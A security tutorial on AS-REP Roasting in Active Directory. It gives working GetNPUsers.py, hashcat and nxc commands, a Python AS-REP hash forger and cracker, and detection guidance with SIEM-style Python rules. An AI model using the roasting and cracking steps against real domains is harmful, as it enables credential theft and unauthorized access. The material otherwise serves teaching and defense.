Disclaimer: This article is for educational purposes and authorized security testing only. Run these techniques exclusively against systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal in most jurisdictions and can carry severe penalties.
Introduction
AS-REP Roasting is one of the most reliable ways to obtain crackable credential material in an Active Directory environment, often without any valid domain account. The attack targets users whose Kerberos pre-authentication has been disabled. When that single flag is set, the Key Distribution Center (KDC) will return an encrypted blob — derived from the user's password — to anyone who simply asks for it.
In this article you will learn how Kerberos pre-authentication works, why disabling it is dangerous, how to enumerate and roast vulnerable accounts with GetNPUsers.py, how to crack the resulting hashes with hashcat mode 18200, and — just as importantly — how a defender detects and prevents the attack. If you understand Kerberoasting, this technique will feel familiar but is distinct: AS-REP Roasting attacks the AS-REQ/AS-REP exchange, not the service-ticket (TGS) exchange.
How It Works
In the standard Kerberos flow, a client requesting a Ticket Granting Ticket (TGT) must prove it knows the user's password before the KDC issues anything. This proof is called pre-authentication: the client encrypts a timestamp with a key derived from the user's password and sends it in the AS-REQ. The KDC decrypts it and, only if the timestamp is valid, replies with an AS-REP containing the encrypted session key material.
When the account attribute DONT_REQ_PREAUTH (bit 0x400000 in userAccountControl) is set, the KDC skips this check. An attacker can send an AS-REQ for that username with no pre-authentication data and the KDC will return an AS-REP. The encrypted part of that AS-REP (the EncASRepPart, which carries the session key and the TGT lifetime) is encrypted with the user's long-term Kerberos key; for RC4-HMAC that key is simply the NT hash, the unsalted MD4 of the password. The blob can therefore be extracted and brute-forced offline by deriving the key from each password guess and checking whether it decrypts cleanly. No valid credentials are required to request it; you only need to know (or guess) the username and reach the KDC on port 88.
Why would DONT_REQ_PREAUTH ever be set? Legacy applications, certain UNIX/Linux Kerberos integrations, and misconfigured service accounts sometimes require it. Each such account is a standing offline-cracking target.
Prerequisites / Lab Setup
To reproduce this in a lab you need:
- A Windows Server Domain Controller (e.g., dc01.lab.local).
- A user account with pre-authentication disabled.
- An attacker host with Impacket and hashcat installed.
Create a vulnerable account in the lab with PowerShell on the DC:
New-ADUser -Name "svc-legacy" -SamAccountName "svc-legacy" `
-AccountPassword (ConvertTo-SecureString "Summer2026!" -AsPlainText -Force) `
-Enabled $true
# Disable Kerberos pre-authentication
Set-ADAccountControl -Identity "svc-legacy" -DoesNotRequirePreAuth $true
You can confirm the flag from any domain-joined host:
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol |
Select-Object SamAccountName, useraccountcontrol
The value 4194304 is decimal for 0x400000, the DONT_REQ_PREAUTH bit.
Attack Walkthrough
Step 1 — Enumerate vulnerable accounts
If you already have any valid domain credentials, you can ask LDAP for every account with the flag set using Impacket's GetNPUsers.py:
GetNPUsers.py lab.local/lowpriv:'Password123!' -dc-ip 10.10.10.10 -request -format hashcat -outputfile asrep.hashes
The -request flag tells the tool to actually request and dump the AS-REP for every vulnerable account it finds.
Step 2 — Roast without credentials
The more dangerous scenario: you have no credentials at all, only a list of candidate usernames (from OSINT, a previous breach, or naming-convention guessing). Supply that list with -usersfile:
GetNPUsers.py lab.local/ -dc-ip 10.10.10.10 -no-pass -usersfile users.txt -format hashcat -outputfile asrep.hashes
Note the trailing slash after lab.local/ (empty username) and -no-pass. For each user that has pre-auth disabled, the KDC returns an AS-REP and Impacket writes a hash. Users that require pre-auth produce KDC_ERR_PREAUTH_REQUIRED and are skipped. A side effect worth knowing about from both sides: a username that does not exist produces a different error, KDC_ERR_C_PRINCIPAL_UNKNOWN, so the same loop also tells the attacker which guessed names are real accounts, and it leaves 4768 failure events with Result Code 0x6 on the domain controller.
A captured hash looks like this (hashcat format):
$krb5asrep$23$svc-legacy@LAB.LOCAL:a1b2c3...d4e5f6$9f8e7d...
The 23 indicates RC4-HMAC (etype 23), whose key is the unsalted NT hash of the password; it is by far the cheapest etype to crack. Which etype you receive depends on what the client requests and which key types the account is allowed to use: GetNPUsers.py asks for RC4 first, so you get etype 23 unless the account has been restricted to AES, in which case the line starts with $krb5asrep$17$ or $krb5asrep$18$ and mode 18200 does not apply (see the defense section).
Step 3 — Crack offline with hashcat
Feed the hashes to hashcat using mode 18200 (Kerberos 5 AS-REP etype 23):
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule
To verify success and display the cracked passwords:
hashcat -m 18200 asrep.hashes --show
John the Ripper works equally well. Note that GetNPUsers.py already defaults to -format hashcat (the variant shown above, for mode 18200); pass -format john to get John's krb5asrep format instead.
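To see why the AS-REP blob is crackable at all, and what hashcat mode 18200 actually computes for each guess, here is the RC4-HMAC construction from RFC 4757 carried through end to end. This is an added example, not code from the article, from Impacket or from hashcat: it plays the KDC to forge a $krb5asrep$23$ line for the lab account (the account name, realm and password are the article's; the enc-part plaintext and the zero confounder are constructed stand-ins, since the real content is a DER-encoded EncASRepPart), then runs the wordlist loop that hashcat runs. MD4 and RC4 are implemented inline so nothing beyond the standard library is needed.

```python
"""Offline AS-REP Roasting against a constructed etype-23 hash line (added example)."""
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
AS_REP_ENC_PART_USAGE = 8  # RFC 4757: RC4-HMAC uses key usage number 8 for the AS-REP enc-part


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; OpenSSL 3 builds often hide md4 behind the legacy provider."""
    bit_len = (len(msg) * 8) & 0xFFFFFFFFFFFFFFFF
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a, b, c, d = d, _rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, _rotl((a + hh(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_key(password: str) -> bytes:
    """The etype-23 long-term key is the NT hash: MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le"))


def _k1(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes):
    """RFC 4757 encrypt: returns (checksum, ciphertext), the two fields of a mode-18200 line."""
    k1 = _k1(key, usage)
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()   # K2 == K1 for non-export keys
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)


def forge_asrep_line(user, realm, password, enc_part_plain, confounder=None):
    """Play the KDC: produce the line GetNPUsers.py -format hashcat would write for this account."""
    confounder = confounder if confounder is not None else os.urandom(8)
    checksum, ct = rc4_hmac_encrypt(rc4_hmac_key(password), AS_REP_ENC_PART_USAGE, enc_part_plain, confounder)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${ct.hex()}"


def parse_asrep_line(line: str):
    """Split '$krb5asrep$23$user@REALM:<checksum hex>$<ciphertext hex>' into its parts."""
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("not an etype-23 AS-REP line (AES lines use $17$/$18$ and a different hashcat mode)")
    principal, rest = line[len(prefix):].split(":", 1)
    checksum_hex, ct_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(ct_hex)


def crack_asrep(line: str, candidates):
    """Per candidate, what mode 18200 does: derive K1/K3, RC4-decrypt, recompute and compare the checksum."""
    _, checksum, ct = parse_asrep_line(line)
    for pw in candidates:
        k1 = _k1(rc4_hmac_key(pw), AS_REP_ENC_PART_USAGE)
        k3 = hmac.new(k1, checksum, hashlib.md5).digest()
        data = rc4(k3, ct)  # confounder || EncASRepPart only if the guess was right
        if hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
            return pw
    return None


# Constructed stand-in for the DER-encoded EncASRepPart; the crack check works on any bytes.
SAMPLE_ENC_PART = b"constructed EncASRepPart stand-in: session key + TGT lifetime".ljust(64, b"\x00")
SAMPLE_LINE = forge_asrep_line("svc-legacy", "LAB.LOCAL", "Summer2026!", SAMPLE_ENC_PART, confounder=bytes(8))
WORDLIST = ["Password123!", "Welcome1", "Summer2025!", "Summer2026!", "Autumn2026!"]  # constructed

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_asrep(SAMPLE_LINE, WORDLIST))
```

Each candidate costs one MD4, three HMAC-MD5 calls and one RC4 pass over the ciphertext, which is why a GPU gets through rockyou-sized lists in seconds; hashcat additionally rejects most wrong guesses early by decrypting only the first block and checking for the ASN.1 structure an EncASRepPart must start with. Contrast the AES etypes, where every guess first has to run the salted PBKDF2 key derivation before any decryption can be tried.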
Step 4 — Use the credentials
Once cracked, validate the password and pivot:
nxc smb 10.10.10.10 -u svc-legacy -p 'Summer2026!'
From here you can enumerate shares, run BloodHound collection, or hunt for further escalation paths.
Attack Flow Diagram
The flow in three steps: the attacker sends an AS-REQ for the target username without any pre-authentication data; because DONT_REQ_PREAUTH is set on that account, the KDC answers with an AS-REP whose encrypted part is protected by the user's password-derived key; the attacker extracts that part and cracks it offline with hashcat mode 18200.
Detection & Defense (Blue Team)
AS-REP Roasting is cheap to detect and even cheaper to eliminate at the root.
1. Eliminate the misconfiguration. The single most effective control is to ensure no account has DONT_REQ_PREAUTH set unless absolutely required. Audit regularly:
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol |
Select-Object SamAccountName, DistinguishedName
Remediate any unexpected results:
Set-ADAccountControl -Identity "svc-legacy" -DoesNotRequirePreAuth $false
2. Strengthen passwords on accounts that genuinely need it. If a legacy app truly requires pre-auth disabled, give the account a long, random (25+ character) password. Offline cracking only works against weak passwords, so a strong one makes the captured hash effectively useless. Where possible, switch the account to use a Group Managed Service Account (gMSA).
3. Disable RC4. Mode 18200 is cheap because etype 23 keys are an unsalted MD4 of the password. AES (etypes 17/18) derives the key with PBKDF2 over a per-principal salt, so each guess costs orders of magnitude more. When an account is restricted to AES, its AS-REP comes back as $krb5asrep$17$ or $krb5asrep$18$, which mode 18200 cannot process; hashcat added separate AS-REP modes for those (32100 for etype 17 and 32200 for etype 18, in 6.2.6 and later). Do not confuse these with 19600/19700, which are the TGS-REP (Kerberoasting) modes for etypes 17/18, or 19800/19900, which crack captured pre-authentication timestamps. Remove RC4 both domain-wide, by applying the "Network security: Configure encryption types allowed for Kerberos" policy (registry value HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters\SupportedEncryptionTypes) to domain controllers as well as clients, and per account, by setting msDS-SupportedEncryptionTypes to AES only (Set-ADUser -KerberosEncryptionType AES128,AES256); reset the password afterwards if it was last set before the domain supported AES, because AES keys only exist for passwords set since then. Expect legacy clients that only speak RC4 to break, so test first. AES only raises the cost; the strong-password control matters most.
4. Monitor Windows event logs. On the domain controllers, watch for Event ID 4768 (A Kerberos authentication ticket (TGT) was requested) with Pre-Authentication Type 0 and a successful Result Code: that is how the KDC records an AS-REP it issued without pre-authentication, and it is the log-side signature of AS-REP Roasting. One caveat: an account that legitimately has the flag set logs type 0 on every normal logon as well, so baseline which accounts and source addresses are expected and alert on deviations. A burst of type-0 events across many usernames from a single source within a short window is a strong indicator of mass roasting, and it is commonly preceded by a run of 4768 failures with Result Code 0x6 (client not found in Kerberos database) from the same source, which is what a wordlist of guessed usernames produces.
Event ID: 4768
Pre-Authentication Type: 0
Ticket Encryption Type: 0x17 (RC4 — additionally suspicious)
5. Alert in your SIEM. Representative detection logic: trigger on 4768 events with Pre-Authentication Type == 0 and a successful result, raising severity when the target account is not on the allow-list of accounts known to need the flag, when many distinct targets appear from one source in a short window, or when the same source also produced a run of Result Code 0x6 failures. This maps to MITRE ATT&CK T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting).
6. Honey accounts. Create a decoy user with pre-auth disabled and a strong password, then alert on any 4768/pre-auth-type-0 event referencing it. Legitimate traffic should never touch it, so any hit is high-fidelity. See our notes on Kerberos honey-token detection.
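The detection logic from points 4 to 6 above, run over sample domain-controller records, as an added example that is not part of the original article. The records are constructed and flattened to key=value text (real 4768 events arrive as EVTX or XML with the same field names: TargetUserName, IpAddress, PreAuthType, TicketEncryptionType, Status); the decoy account name svc-backup-legacy, the source addresses and the thresholds are assumptions to substitute with your own. It implements three rules: a hit on the honey account, a burst of distinct pre-auth-disabled accounts roasted from one source, and the username-enumeration pattern (Result Code 0x6) that a -usersfile run leaves behind.

```python
"""AS-REP Roasting detection over constructed 4768 records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

HONEY_ACCOUNTS = {"svc-backup-legacy"}  # hypothetical decoy with pre-auth disabled; substitute your own
BURST_ACCOUNTS = 5                      # distinct accounts roasted from one source inside WINDOW
ENUM_FAILURES = 5                       # distinct unknown usernames (0x6) from one source inside WINDOW
WINDOW = timedelta(seconds=60)

# Constructed sample: one normal logon (PreAuthType 2, AES), one legitimate use of the
# pre-auth-disabled account from its application host, a 4769 line to show filtering, then an
# attacker at 10.10.14.5 enumerating names (0x6) and roasting five accounts in a few seconds.
SAMPLE_EVENTS = """\
2026-03-14T09:00:01 EventID=4768 TargetUserName=alice IpAddress=::ffff:10.10.20.15 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
2026-03-14T09:00:02 EventID=4768 TargetUserName=svc-legacy IpAddress=::ffff:10.10.20.99 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2026-03-14T09:00:03 EventID=4769 TargetUserName=alice@LAB.LOCAL IpAddress=::ffff:10.10.20.15 ServiceName=cifs/fs01 Status=0x0
2026-03-14T09:14:50 EventID=4768 TargetUserName=jsmith IpAddress=::ffff:10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
2026-03-14T09:14:51 EventID=4768 TargetUserName=mjones IpAddress=::ffff:10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
2026-03-14T09:14:52 EventID=4768 TargetUserName=admin2 IpAddress=::ffff:10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
2026-03-14T09:14:53 EventID=4768 TargetUserName=backup IpAddress=::ffff:10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
2026-03-14T09:14:54 EventID=4768 TargetUserName=helpdesk IpAddress=::ffff:10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
2026-03-14T09:14:55 EventID=4768 TargetUserName=svc-web IpAddress=::ffff:10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
2026-03-14T09:15:00 EventID=4768 TargetUserName=svc-legacy IpAddress=::ffff:10.10.14.5 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2026-03-14T09:15:01 EventID=4768 TargetUserName=svc-sql IpAddress=::ffff:10.10.14.5 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2026-03-14T09:15:02 EventID=4768 TargetUserName=svc-backup-legacy IpAddress=::ffff:10.10.14.5 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2026-03-14T09:15:03 EventID=4768 TargetUserName=svc-print IpAddress=::ffff:10.10.14.5 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2026-03-14T09:15:04 EventID=4768 TargetUserName=svc-scan IpAddress=::ffff:10.10.14.5 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
"""


def parse_events(text):
    """Turn the flattened records into dicts; the IPv4-mapped prefix the DC logs is stripped."""
    events = []
    for line in text.strip().splitlines():
        ts, *kv = line.split()
        ev = dict(item.split("=", 1) for item in kv)
        ev["ts"] = datetime.fromisoformat(ts)
        ev["ip"] = ev.get("IpAddress", "").removeprefix("::ffff:")
        events.append(ev)
    return events


def preauth_zero_successes(events):
    """Every TGT the KDC issued without pre-authentication: the raw AS-REP Roasting signal."""
    return [e for e in events
            if e.get("EventID") == "4768" and e.get("PreAuthType") == "0" and e.get("Status") == "0x0"]


def _windowed(group, key, threshold):
    """True if any WINDOW-long slice of group (sorted by ts) holds >= threshold distinct key values."""
    group = sorted(group, key=lambda e: e["ts"])
    for i, start in enumerate(group):
        seen = {e[key] for e in group[i:] if e["ts"] - start["ts"] <= WINDOW}
        if len(seen) >= threshold:
            return True
    return False


def run_rules(events):
    alerts = []
    roast = preauth_zero_successes(events)
    for e in roast:  # rule 1: the decoy should never be requested by anyone
        if e["TargetUserName"].lower() in HONEY_ACCOUNTS:
            alerts.append({"rule": "honey_account", "severity": "critical", "ip": e["ip"], "user": e["TargetUserName"]})
    by_ip = defaultdict(list)  # rule 2: many distinct pre-auth-disabled accounts from one source
    for e in roast:
        by_ip[e["ip"]].append(e)
    for ip, group in by_ip.items():
        if _windowed(group, "TargetUserName", BURST_ACCOUNTS):
            alerts.append({"rule": "asrep_burst", "severity": "high", "ip": ip,
                           "users": sorted({e["TargetUserName"] for e in group})})
    fails = defaultdict(list)  # rule 3: 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN, i.e. guessed usernames
    for e in events:
        if e.get("EventID") == "4768" and e.get("Status") == "0x6":
            fails[e["ip"]].append(e)
    for ip, group in fails.items():
        if _windowed(group, "TargetUserName", ENUM_FAILURES):
            alerts.append({"rule": "user_enumeration", "severity": "medium", "ip": ip, "count": len(group)})
    return alerts


if __name__ == "__main__":
    for alert in run_rules(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The single type-0 event from 10.10.20.99 deliberately produces no alert: it is the application host that legitimately uses svc-legacy, which is why the burst rule counts distinct accounts per source instead of firing on every type-0 event. Feed that baseline into an allow-list of expected (account, source) pairs and alert on anything outside it.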
Conclusion
AS-REP Roasting turns a single misconfigured account attribute into a credential-disclosure primitive that often requires no authentication to exploit. The attack chain is short: enumerate accounts with DONT_REQ_PREAUTH, request their AS-REP with GetNPUsers.py, and crack the password-derived blob offline using hashcat mode 18200. For defenders the lesson is equally simple — audit for the flag, enforce strong passwords and AES on any account that genuinely needs it, and alert on Event ID 4768 with pre-authentication type 0. For deeper coverage of the related TGS-based attack, see Kerberoasting.
References
- MITRE ATT&CK — T1558.004 AS-REP Roasting: https://attack.mitre.org/techniques/T1558/004/
- HackTricks — AS-REP Roasting: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast
- Impacket (GetNPUsers.py): https://github.com/fortra/impacket
- hashcat example hashes (mode 18200): https://hashcat.net/wiki/doku.php?id=example_hashes
- Microsoft — userAccountControl flags: https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/useraccountcontrol-manipulate-account-properties
- Microsoft — Event 4768 (Kerberos TGT requested): https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768